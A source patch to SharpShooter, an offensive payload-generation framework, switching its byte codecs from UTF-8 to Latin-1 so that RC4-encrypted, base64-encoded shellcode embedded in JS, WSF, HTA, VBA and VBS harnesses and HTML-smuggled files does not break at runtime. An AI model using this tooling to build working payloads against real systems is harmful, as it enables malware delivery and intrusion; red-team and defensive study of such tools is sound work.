From: X0RW3LL <x0rw3ll@gmail.com>
Date: Mon, 19 Aug 2024 14:39:59 +0300
Subject: Use correct byte codecs
 Previous patches in this series rely on an upstream PR that uses UTF-8 codecs
 for reading files, encoding and decoding operations. The correct codecs to use
 should be Latin-1. Reason being that UTF-8 does not include 0xFE and 0xFF.
 This poses a significant issue that goes unnoticed during testing, but affects
 core functionality. Since raw shellcode, which is essentially read from a file,
 may contain those characters, subsequent encoding/decoding is going to be
 incorrect, thus affecting the final payload which breaks at runtime. For more
 information, please refer to the following links:
 https://en.wikipedia.org/wiki/UTF-8
 https://en.wikipedia.org/wiki/ISO/IEC_8859-1
 https://docs.python.org/3/howto/unicode.html#id2
 https://datatracker.ietf.org/doc/html/rfc3629#section-3
Forwarded: https://github.com/mdsecactivebreach/SharpShooter/pull/44

--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -405,7 +405,7 @@
             except Exception as e:
                 print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
 
-        template_body = template_body.decode(encoding='utf-8')
+        template_body = template_body.decode(encoding='latin-1')
         template_code = template_body.replace("%SANDBOX_ESCAPES%", sandbox_techniques)
 
         delivery_method = "1"
@@ -449,7 +449,7 @@
                     #    sc_split = [encoded_sc[i:i+100] for i in range(0, len(encoded_sc), 100)]
                     #    for i in sc_split:
                     #else:
-                    template_code = template_code.replace("%SHELLCODE64%", encoded_sc.decode(encoding='utf-8'))
+                    template_code = template_code.replace("%SHELLCODE64%", encoded_sc.decode(encoding='latin-1'))
 
                 else:
                     refs = args.refs
@@ -521,36 +521,36 @@
 
         key = self.rand_key(10)
         payload_encrypted = self.rc4(key, template_code)
-        payload_encoded = base64.b64encode(payload_encrypted.encode(encoding='utf-8'))
+        payload_encoded = base64.b64encode(payload_encrypted.encode(encoding='latin-1'))
 
         awl_payload_simple = ""
 
         if("js" in file_type or args.comtechnique):
-            harness = self.read_file(source_path + "templates/harness.js").decode(encoding='UTF-8')
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
+            harness = self.read_file(source_path + "templates/harness.js").decode(encoding='latin-1')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='latin-1'))
             payload = payload.replace("%KEY%", "'%s'" % (key))
             payload_minified = jsmin(payload)
             awl_payload_simple = template_code
         elif("wsf" in file_type):
-            harness = self.read_file(source_path + "templates/harness.wsf").decode(encoding='utf-8')
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
+            harness = self.read_file(source_path + "templates/harness.wsf").decode(encoding='latin-1')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='latin-1'))
             payload = payload.replace("%KEY%", "'%s'" % (key))
             payload_minified = jsmin(payload)
         elif("hta" in file_type):
-            harness = self.read_file(source_path + "templates/harness.hta").decode(encoding='utf-8')
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
+            harness = self.read_file(source_path + "templates/harness.hta").decode(encoding='latin-1')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='latin-1'))
             payload = payload.replace("%KEY%", "'%s'" % (key))
             payload_minified = jsmin(payload)
         elif("vba" in file_type):
-            harness = self.read_file(source_path + "templates/harness.vba").decode(encoding='utf-8')
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
+            harness = self.read_file(source_path + "templates/harness.vba").decode(encoding='latin-1')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='latin-1'))
             payload = payload.replace("%KEY%", "\"%s\"" % (key))
             payload_minified = jsmin(payload)
         elif("slk" in file_type):
             pass
         else:
-            harness = self.read_file(source_path + "templates/harness.vbs").decode(encoding='utf-8')
-            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
+            harness = self.read_file(source_path + "templates/harness.vbs").decode(encoding='latin-1')
+            payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='latin-1'))
             payload = payload.replace("%KEY%", "\"%s\"" % (key))
 
         if (payload_type == 3):
@@ -588,7 +588,7 @@
             outputfile_shellcode = outputfile + ".payload"
             with open(outputfile_shellcode, 'w') as f:
                 gzip_encoded = base64.b64encode(shellcode_gzip.getvalue())
-                f.write(gzip_encoded.decode(encoding='utf-8'))
+                f.write(gzip_encoded.decode(encoding='latin-1'))
                 f.close()
                 print("\033[1;34m[*]\033[0;0m Written shellcode payload to %s" % outputfile_shellcode)
 
--- a/modules/embedinhtml.py
+++ b/modules/embedinhtml.py
@@ -134,7 +134,7 @@
             print("\033[93m[!]\033[0;0m Could not determine the mime type for the input file. Force it using the -m switch.")
             quit()
 
-        payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes.decode(encoding='utf-8')).encode())
+        payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes.decode(encoding='latin-1')).encode())
         print("\033[1;34m[*]\033[0;0m Encrypted input file with key [{}]".format(key))
 
         # blobShim borrowed from https://github.com/mholt/PapaParse/issues/175#issuecomment-75597039
